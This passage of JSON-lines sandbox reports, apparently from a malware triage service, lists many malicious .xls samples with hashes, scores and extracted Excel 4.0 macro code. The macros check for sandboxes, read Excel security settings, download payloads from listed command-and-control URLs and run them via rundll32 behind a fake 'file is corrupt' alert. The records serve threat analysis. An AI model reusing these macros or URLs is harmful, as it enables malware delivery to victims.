CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WR8K4uBSuZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"512d7e795d18942e22c799499281d5900318f05b5072d084c4872b928fd68401"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"512d7e795d18942e22c799499281d5900318f05b5072d084c4872b928fd68401","filesize":167936,"md5":"4165b38295d82f1386d7bedce902f114","sha1":"caeac5e0c69c0d8e1ba4c081cfa7958e9bb62f79","sha256":"512d7e795d18942e22c799499281d5900318f05b5072d084c4872b928fd68401","sha512":"b008e991f318470f7897826bf1196800c2af0f81b3b831d80315e59fcd00b70e6a694e9d15d7e3bc5ea23d4bd173f93d2804330dc0c5dbc74853f181431d4736","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"512d7e795d18942e22c799499281d5900318f05b5072d084c4872b928fd68401.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Y1mtSHM77v\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"514bb665342331d442783071d32afc1d2c6a8e111bfb0ffc82974caceb3640c5"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"514bb665342331d442783071d32afc1d2c6a8e111bfb0ffc82974caceb3640c5","filesize":167936,"md5":"9850647850be0e43d32409dbdb2ce8a2","sha1":"3eb8a4197c5dddadc6791a7164ffbb64960c0fdf","sha256":"514bb665342331d442783071d32afc1d2c6a8e111bfb0ffc82974caceb3640c5","sha512":"dc81767418e588a22769847029267ae1919e6dd469ead9c1fbc663457bccccc8094c585e1cddd2ad44b943e5c70560664c5b5599955a342e72fa222fcac68632","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"514bb665342331d442783071d32afc1d2c6a8e111bfb0ffc82974caceb3640c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"homdLSJSDZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"514c95ea4566dcd7093398399caa7af399ebe23bc67dc7b1d66f3e30e00d6634"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"514c95ea4566dcd7093398399caa7af399ebe23bc67dc7b1d66f3e30e00d6634","filesize":116224,"md5":"c7cbdf3a9753d8ba44c0ac64413d36f4","sha1":"7a0ebd85d88532eedc05cc56ae82b7bb27f775a9","sha256":"514c95ea4566dcd7093398399caa7af399ebe23bc67dc7b1d66f3e30e00d6634","sha512":"237e92c689231211b70f3bc58fad43d5e03e91b65bc9e3a11195d75c5ee66e63c927f150757f36a75e7537e8fbcc390b1f33a50d817d022d9550c86f334c6a2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"514c95ea4566dcd7093398399caa7af399ebe23bc67dc7b1d66f3e30e00d6634.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qc1qesi7Jn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5169351c69f3e8841b0fd9087c97f3d7da9bf7e43b9d56199f3f0dfd165c6b34"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"5169351c69f3e8841b0fd9087c97f3d7da9bf7e43b9d56199f3f0dfd165c6b34","filesize":170496,"md5":"6fd4468a470808f0468289189c320395","sha1":"dc6c83ef30991fed1196d99cef96751233719b8f","sha256":"5169351c69f3e8841b0fd9087c97f3d7da9bf7e43b9d56199f3f0dfd165c6b34","sha512":"b9833e113874448b2671274bbb4bca40347ba223067b3f6f01192eee8743c6af96fdd3fdb63f609b0d1a5f16525f007fba8a69c2128dade37ce0b322d6d231ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5169351c69f3e8841b0fd9087c97f3d7da9bf7e43b9d56199f3f0dfd165c6b34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CCnokU5Cf1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5172974e49c8358afeeabb8183c39c4f6b7cfc574799e5e81a3abef1a7b0f799"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"5172974e49c8358afeeabb8183c39c4f6b7cfc574799e5e81a3abef1a7b0f799","filesize":104448,"md5":"925983b4b2cce1edccc83f5b1c5c3b39","sha1":"a68c2e7fe6528c433b22d38da536c076d57dbfd4","sha256":"5172974e49c8358afeeabb8183c39c4f6b7cfc574799e5e81a3abef1a7b0f799","sha512":"ef1aebbddba5d5eb25452514fb5ca6fb2292b47503940cdff4aae357e7c29c474d1ba7fa946dd92c35d1e9830ab226c78b019c3f5a42cbd14c2e50bb867e8858","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5172974e49c8358afeeabb8183c39c4f6b7cfc574799e5e81a3abef1a7b0f799.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"k3nIrY2QG4\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"519681e553eb9a104ee8bebb45b464a28bb6557065ed315626508d8f71b6f9ab"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"519681e553eb9a104ee8bebb45b464a28bb6557065ed315626508d8f71b6f9ab","filesize":141824,"md5":"4632f1c482ecd50ef77495327e588724","sha1":"ef9dac0d0aa690265b3540271d1d5485ee454caa","sha256":"519681e553eb9a104ee8bebb45b464a28bb6557065ed315626508d8f71b6f9ab","sha512":"0362fe4fdce916879f85da1a79eba96df469b92909d4acc8e4ecd202c591d67519c71142c76a67f9cf512ff259d21c6eaef93b895b8bba12f439f0e7f85fd698","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"519681e553eb9a104ee8bebb45b464a28bb6557065ed315626508d8f71b6f9ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"ynATMlvwcs\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"51aa09e3067b54ee5c34a70a255e3a8c566bf32ebaeb57504e75fa60da61a4f1"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"51aa09e3067b54ee5c34a70a255e3a8c566bf32ebaeb57504e75fa60da61a4f1","filesize":209920,"md5":"eb1e4accc20d8b9a92e9e175dd29091b","sha1":"e8c7c0edf318f0fed023786583cef18eccd3eee7","sha256":"51aa09e3067b54ee5c34a70a255e3a8c566bf32ebaeb57504e75fa60da61a4f1","sha512":"7bf566241534b59283a0c256a9cdaee55b00420ce5d0bf48dae831846dd1d7f6838e89beda71255ddf8565b4927e2e2f6186a77a3ed7a5ceb68fcd19b71688f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"51aa09e3067b54ee5c34a70a255e3a8c566bf32ebaeb57504e75fa60da61a4f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dkZbvR1Awq\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"51aaaa737483c7fd459f70c782427a1efd4dfa5aa0ac12c973a608dc705a516f"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"51aaaa737483c7fd459f70c782427a1efd4dfa5aa0ac12c973a608dc705a516f","filesize":219136,"md5":"e780ed51bbe1ce186809b2a54bdba9f8","sha1":"562056982e22b112b8100070ab9a24ac5e86b4cf","sha256":"51aaaa737483c7fd459f70c782427a1efd4dfa5aa0ac12c973a608dc705a516f","sha512":"0e3f91de1223320679b7cf0cfc70b1b9208246001973db710a4955eaa984fb1fa9da5dd063d53a719273f371f3bb6a233c2d178f2cada81093b12065658de2cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"51aaaa737483c7fd459f70c782427a1efd4dfa5aa0ac12c973a608dc705a516f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qnMo93d6HY\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"51ac4d05b4f67aab338c6e3763421a2ed5c888c9c4cdd626442a460ff3b92e34"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"51ac4d05b4f67aab338c6e3763421a2ed5c888c9c4cdd626442a460ff3b92e34","filesize":167936,"md5":"4d1d58136d60566a00ad285808fa2b95","sha1":"ce453306926c336e0401248c65bbb1428bdfdb08","sha256":"51ac4d05b4f67aab338c6e3763421a2ed5c888c9c4cdd626442a460ff3b92e34","sha512":"c5cc2d68ce3650ab20d62a1097b024f3da3eb85be4b6b45912911f4b5705092e5fdcb9ceaf8e6af719b7a5b2310c9b09a4936a5252174a1f16a6b9f3d5c02135","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"51ac4d05b4f67aab338c6e3763421a2ed5c888c9c4cdd626442a460ff3b92e34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7CrhapmunK\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"51d6afc0446cb4ace075dd2fdb975faf5fc09727d59f07d133f08f62e3607532"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"51d6afc0446cb4ace075dd2fdb975faf5fc09727d59f07d133f08f62e3607532","filesize":167936,"md5":"9f70350293c79d819a9b51f1c78c7894","sha1":"a5270aa62e16a0e8c8845ae5b2db446b6a1b332a","sha256":"51d6afc0446cb4ace075dd2fdb975faf5fc09727d59f07d133f08f62e3607532","sha512":"a48ed68f38f69693092076831a045287f22c5dfc3db4441861d314ffce9899d54acc060ee5a065064bca427de7f9cc832dc48256072c0ecd7ce99264e6e0676c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"51d6afc0446cb4ace075dd2fdb975faf5fc09727d59f07d133f08f62e3607532.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mx5KEOe84q\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"51f8fda0f07029ccf4156dce4877b86c587383f087eef155252511d5530059db"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"51f8fda0f07029ccf4156dce4877b86c587383f087eef155252511d5530059db","filesize":147968,"md5":"067071c5c07ffe4b0ac91f913d96edbc","sha1":"e67cabb50067c1957a64629ab95b880d45f9a1f4","sha256":"51f8fda0f07029ccf4156dce4877b86c587383f087eef155252511d5530059db","sha512":"b59f23b8c1dae963024dd5cd2a3bf59dd5ad7cb0ab0cfad8e72e97d4336c061b8cc52cbc193f4bc99eec789c3c3ddbe158da2aa4c7fc9dccada33c84d4cb7aed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"51f8fda0f07029ccf4156dce4877b86c587383f087eef155252511d5530059db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"OjAD3YSQCz\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"51fb3895bf0a20db9d537a568e22ed57e112d2872b79e031e74822b212b11c66"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"51fb3895bf0a20db9d537a568e22ed57e112d2872b79e031e74822b212b11c66","filesize":206336,"md5":"df5b71b18dc17d475ac5930f734e698d","sha1":"818eb18e7d80edb1205944fbce3e674efae5a5ee","sha256":"51fb3895bf0a20db9d537a568e22ed57e112d2872b79e031e74822b212b11c66","sha512":"6bca6e37d0068d87956f21daa90e54551cf30832866994cefdb9672bf0c99d9dc9f3d040ca86ba9a92a52cd2c8aad8dccef3f96c8cb9bab8407da503c6110f85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"51fb3895bf0a20db9d537a568e22ed57e112d2872b79e031e74822b212b11c66.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R4vUnAneTk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52091ffc01a2869fa707d9ce01a38bec412e4229bd318526e8a4fdfeb2f8c5ee"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52091ffc01a2869fa707d9ce01a38bec412e4229bd318526e8a4fdfeb2f8c5ee","filesize":167936,"md5":"cd74a6be94968cc4b25d7616ec1f48fa","sha1":"ca0a4e56025224272fb277780decf5a596712033","sha256":"52091ffc01a2869fa707d9ce01a38bec412e4229bd318526e8a4fdfeb2f8c5ee","sha512":"8aac6ec3695d2168127a089f06d5c990187db135318ab4530099012e36effc6cf76719321d4ae8bf66d68d5a5e4bec41d1199e1fa003ddb9015ac39e0625c685","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52091ffc01a2869fa707d9ce01a38bec412e4229bd318526e8a4fdfeb2f8c5ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sofIWafPxg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5211823dd32dda68a1295c07c708ec0f4586fe92c045e5a1d5ba95266d065d3e"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"5211823dd32dda68a1295c07c708ec0f4586fe92c045e5a1d5ba95266d065d3e","filesize":185344,"md5":"39d430a7f8d6e45405f2debb419e8828","sha1":"58819abea9d9dd1dca6b474e0535509a4a995a80","sha256":"5211823dd32dda68a1295c07c708ec0f4586fe92c045e5a1d5ba95266d065d3e","sha512":"5c75899dc2fabbf71edccd52842ff87de74f05823216001c4cb56420192ec1abacb74537d5e5b1dc7b00aedc7531c521f9f46143b30a09ad72758390281d6517","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5211823dd32dda68a1295c07c708ec0f4586fe92c045e5a1d5ba95266d065d3e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"52186fe510d2bcfcf639180932efd95dae58b9f89642c1ca937f159254cc4a14"},"analysis":{"reported":"2020-04-09T16:16:18Z","score":10},"files":[{"filename":"52186fe510d2bcfcf639180932efd95dae58b9f89642c1ca937f159254cc4a14","filesize":212992,"md5":"bacc6043da656d16de1ba19ebf1a44a8","sha1":"763487a5e0722f0f965987f2dfbdb0176625b482","sha256":"52186fe510d2bcfcf639180932efd95dae58b9f89642c1ca937f159254cc4a14","sha512":"603a91e6367560a85d9c986d9c4fe4479e6a57f9bc4639924a6074fde8f521d7c225e68a7f879c6bcc24e820e8952832cb82b2a9ccdec40126be77a5d91f23b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"52186fe510d2bcfcf639180932efd95dae58b9f89642c1ca937f159254cc4a14.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xzGnk6hCzn\",TRUE)\nGOTO(R$0C$17)"}}}]}
